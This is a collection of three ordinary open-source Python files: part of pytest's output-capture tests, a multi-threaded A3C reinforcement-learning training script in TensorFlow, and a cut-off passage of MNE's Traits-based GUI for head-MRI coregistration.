break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
result_with_capture.stdout.fnmatch_lines(
["E * TypeError: write() argument must be str, not bytes"]
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
|
train.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import os
from network import ActorCriticFFNetwork
from training_thread import A3CTrainingThread
from utils.ops import log_uniform
from utils.rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import TASK_TYPE
from constants import TASK_LIST
if __name__ == '__main__':
device = "/gpu:0" if USE_GPU else "/cpu:0"
network_scope = TASK_TYPE
list_of_tasks = TASK_LIST
scene_scopes = list_of_tasks.keys()
global_t = 0
stop_requested = False
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
global_network = ActorCriticFFNetwork(action_size = ACTION_SIZE,
device = device,
network_scope = network_scope,
scene_scopes = scene_scopes)
branches = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task))
NUM_TASKS = len(branches)
assert PARALLEL_SIZE >= NUM_TASKS, \
"Not enough threads for multitasking: at least {} threads needed.".format(NUM_TASKS)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
# instantiate each training thread
# each thread is training for one target in one scene
training_threads = []
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
learning_rate_input,
grad_applier, MAX_TIME_STEP,
device = device,
network_scope = "thread-%d"%(i+1),
scene_scope = scene,
task_scope = task)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# create tensorboard summaries
summary_op = dict()
summary_placeholders = dict()
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
key = scene + "-" + task
# summary for tensorboard
episode_reward_input = tf.placeholder("float")
episode_length_input = tf.placeholder("float")
episode_max_q_input = tf.placeholder("float")
scalar_summaries = [
tf.summary.scalar(key+"/Episode Reward", episode_reward_input),
tf.summary.scalar(key+"/Episode Length", episode_length_input),
tf.summary.scalar(key+"/Episode Max Q", episode_max_q_input)
]
summary_op[key] = tf.summary.merge(scalar_summaries)
summary_placeholders[key] = {
"episode_reward_input": episode_reward_input,
"episode_length_input": episode_length_input,
"episode_max_q_input": episode_max_q_input,
"learning_rate_input": learning_rate_input
}
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)
# init or load checkpoint with saver
# if you don't need to be able to resume training, use the next line instead.
# it will result in a much smaller checkpoint file.
# saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
saver = tf.train.Saver(max_to_keep=10)
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded: {}".format(checkpoint.model_checkpoint_path))
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: {}".format(global_t))
else:
print("Could not find old checkpoint")
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
scene, task = branches[parallel_index % NUM_TASKS]
key = scene + "-" + task
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op[key], summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk
if parallel_index == 0 and global_t - last_global_t > 1000000:
print('Save checkpoint at timestamp %d' % global_t)
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
last_global_t = global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(threading.Thread(target=train_function, args=(i,)))
signal.signal(signal.SIGINT, signal_handler)
# start each training thread
for t in train_threads:
t.start()
print('Press Ctrl+C to stop.')
signal.pause()
# wait for all threads to finish
for t in train_threads:
t.join()
print('Now saving data. Please wait.')
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
summary_writer.close()
|
_coreg_gui.py
|
"""Traits-based GUI for head-MRI coregistration"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import warnings
import numpy as np
from scipy.spatial.distance import cdist
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, warning, OK, YES, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo,
Directory, Enum, Float, HasTraits,
HasPrivateTraits, Instance, Int, on_trait_change,
Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid,
EnumEditor, Handler, Label, TextEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = Handler = object
cached_property = on_trait_change = MayaviScene = MlabSceneModel =\
Bool = Button = DelegatesTo = Directory = Enum = Float = Instance =\
Int = Property = Str = View = Item = Group = HGroup = VGroup = VGrid =\
EnumEditor = Label = TextEditor = Action = UndoButton = CancelButton =\
NoButtons = SceneEditor = trait_wraith
from ..coreg import bem_fname, trans_fname
from ..io.constants import FIFF
from ..forward import prepare_bem_model
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_point_cloud_error)
from ..utils import get_subjects_dir, logger
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import (set_mne_root, trans_wildcard, RawSource,
SubjectSelectorPanel)
from ._viewer import (defaults, HeadViewController, PointObject, SurfaceObject,
_testing_mode)
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(RawSource, ())
# parameters
grow_hair = Float(label="Grow Hair [mm]", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="Right (X)")
scale_y = Float(1, label="Anterior (Y)")
scale_z = Float(1, label="Superior (Z)")
rot_x = Float(0, label="Right (X)")
rot_y = Float(0, label="Anterior (Y)")
rot_z = Float(0, label="Superior (Z)")
trans_x = Float(0, label="Right (X)")
trans_y = Float(0, label="Anterior (Y)")
trans_z = Float(0, label="Superior (Z)")
prepare_bem_model = Bool(True, desc="whether to run mne_prepare_bem_model "
"after scaling the MRI")
# secondary to parameters
scale = Property(depends_on=['n_scale_params', 'scale_x', 'scale_y',
'scale_z'])
has_fid_data = Property(Bool, depends_on=['mri_origin', 'hsp.nasion'],
desc="Required fiducials data is present.")
has_pts_data = Property(Bool, depends_on=['mri.points', 'hsp.points'])
# MRI dependent
mri_origin = Property(depends_on=['mri.nasion', 'scale'],
desc="Coordinates of the scaled MRI's nasion.")
# target transforms
mri_scale_trans = Property(depends_on=['scale'])
head_mri_trans = Property(depends_on=['hsp.nasion', 'rot_x', 'rot_y',
'rot_z', 'trans_x', 'trans_y',
'trans_z', 'mri_origin'],
desc="Transformaiton of the head shape to "
"match the scaled MRI.")
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(Bool, depends_on=['n_scale_params',
'subject_has_bem'])
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(depends_on='hsp.raw_fname', desc="Subject guess "
"based on the raw file name.")
# transformed geometry
processed_mri_points = Property(depends_on=['mri.points', 'grow_hair'])
transformed_mri_points = Property(depends_on=['processed_mri_points',
'mri_scale_trans'])
transformed_hsp_points = Property(depends_on=['hsp.points',
'head_mri_trans'])
transformed_mri_lpa = Property(depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(depends_on=['mri.nasion',
'mri_scale_trans'])
transformed_hsp_nasion = Property(depends_on=['hsp.nasion',
'head_mri_trans'])
transformed_mri_rpa = Property(depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(depends_on=['transformed_mri_lpa',
'transformed_hsp_lpa'])
nasion_distance = Property(depends_on=['transformed_mri_nasion',
'transformed_hsp_nasion'])
rpa_distance = Property(depends_on=['transformed_mri_rpa',
'transformed_hsp_rpa'])
point_distance = Property(depends_on=['transformed_mri_points',
'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(depends_on=['lpa_distance', 'nasion_distance',
'rpa_distance'])
points_eval_str = Property(depends_on='point_distance')
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if np.isscalar(self.scale) or self.scale.ndim == 0:
if self.scale == 1:
return np.eye(4)
else:
s = self.scale
return scaling(s, s, s)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
if np.isscalar(self.scale) and self.scale == 1:
return self.mri.nasion
else:
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
@cached_property
def _get_processed_mri_points(self):
if self.grow_hair:
if len(self.mri.norms):
if self.n_scale_params == 0:
scaled_hair_dist = self.grow_hair / 1000
else:
scaled_hair_dist = self.grow_hair / self.scale / 1000
points = self.mri.points.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += self.mri.norms[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing form bem, can't grow hair")
self.grow_hair = 0
return self.mri.points
@cached_property
def _get_transformed_mri_points(self):
points = apply_trans(self.mri_scale_trans, self.processed_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0 or
len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
txt = ("Fiducials Error: LPA %.1f mm, NAS %.1f mm, RPA %.1f mm" % d)
return txt
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = np.mean(self.point_distance)
return "Average Points Error: %.1f mm" % (av_dist * 1000)
def _get_raw_subject(self):
# subject name guessed based on the raw file name
if '_' in self.hsp.raw_fname:
subject, _ = self.hsp.raw_fname.split('_', 1)
if not subject:
subject = None
else:
subject = None
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
with warnings.catch_warnings(record=True): # Traits None comp
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False) # noqa
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"Find rotation to fit LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"Find rotation and translation to fit all 3 fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"Find rotation to fit head shapes"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"Find rotation and MRI scaling based on LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"Find translation, rotation and scaling based on the three fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"Find MRI scaling and rotation to match head shape points"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to):
desc = 'Scaling %s' % subject_to
func = scale_mri
args = (self.mri.subject, subject_to, self.scale)
kwargs = dict(overwrite=True, subjects_dir=self.mri.subjects_dir)
return (desc, func, args, kwargs)
def get_prepare_bem_model_job(self, subject_to):
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_name = 'inner_skull-bem'
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name=bem_name)
if not os.path.exists(bem_file):
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='(.+-bem)')
bem_dir, bem_file = os.path.split(pattern)
m = None
bem_file_pattern = re.compile(bem_file)
for name in os.listdir(bem_dir):
m = bem_file_pattern.match(name)
if m is not None:
break
if m is None:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='*-bem')
err = ("No bem file found; looking for files matching "
"%s" % pattern)
error(None, err)
bem_name = m.group(1)
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name=bem_name)
# job
desc = 'mne_prepare_bem_model for %s' % subject_to
func = prepare_bem_model
args = (bem_file,)
kwargs = {}
return (desc, func, args, kwargs)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration"""
self.reset_traits(('grow_hair', 'n_scaling_params', 'scale_x',
'scale_y', 'scale_z', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation parameters from a transformation matrix
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
trans_matrix = self.head_mri_trans
trans = {'to': FIFF.FIFFV_COORD_MRI, 'from': FIFF.FIFFV_COORD_HEAD,
'trans': trans_matrix}
write_trans(fname, trans)
class CoregFrameHandler(Handler):
"""Handler that checks for unfinished processes before closing its window
"""
def close(self, info, is_ok):
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
return True
class CoregPanel(HasPrivateTraits):
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
grow_hair = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
scale_step = Float(1.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save As...")
load_trans = Button
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(VGroup(Item('grow_hair', show_label=True),
Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:No Scaling',
1: '2:1 Param',
3: '3:3 Params'},
cols=3)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0'),
Item('scale_x_dec',
enabled_when='n_scale_params > 0'),
Item('scale_x_inc',
enabled_when='n_scale_params > 0'),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0'),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_y_dec',
enabled_when='n_scale_params > 1'),
Item('scale_y_inc',
enabled_when='n_scale_params > 1'),
Label('(Step)'),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_z_dec',
enabled_when='n_scale_params > 1'),
Item('scale_z_inc',
enabled_when='n_scale_params > 1'),
show_labels=False, columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
'_',
Label("Translation:"),
VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis"),
'trans_x_dec', 'trans_x_inc',
Item('trans_step', tooltip="Movement step"),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_y_dec', 'trans_y_inc',
Label('(Step)'),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_z_dec', 'trans_z_inc',
show_labels=False, columns=4),
Label("Rotation:"),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis"),
'rot_x_dec', 'rot_x_inc',
Item('rot_step', tooltip="Rotation step"),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_y_dec', 'rot_y_inc',
Label('(Step)'),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_z_dec', 'rot_z_inc',
show_labels=False, columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point"),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place"),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials"),
Item('load_trans', enabled_when='has_fid_data'),
show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
HGroup(Item('prepare_bem_model'),
Label("Run mne_prepare_bem_model"),
show_labels=False,
enabled_when='can_prepare_bem_model'),
HGroup(Item('save', enabled_when='can_save',
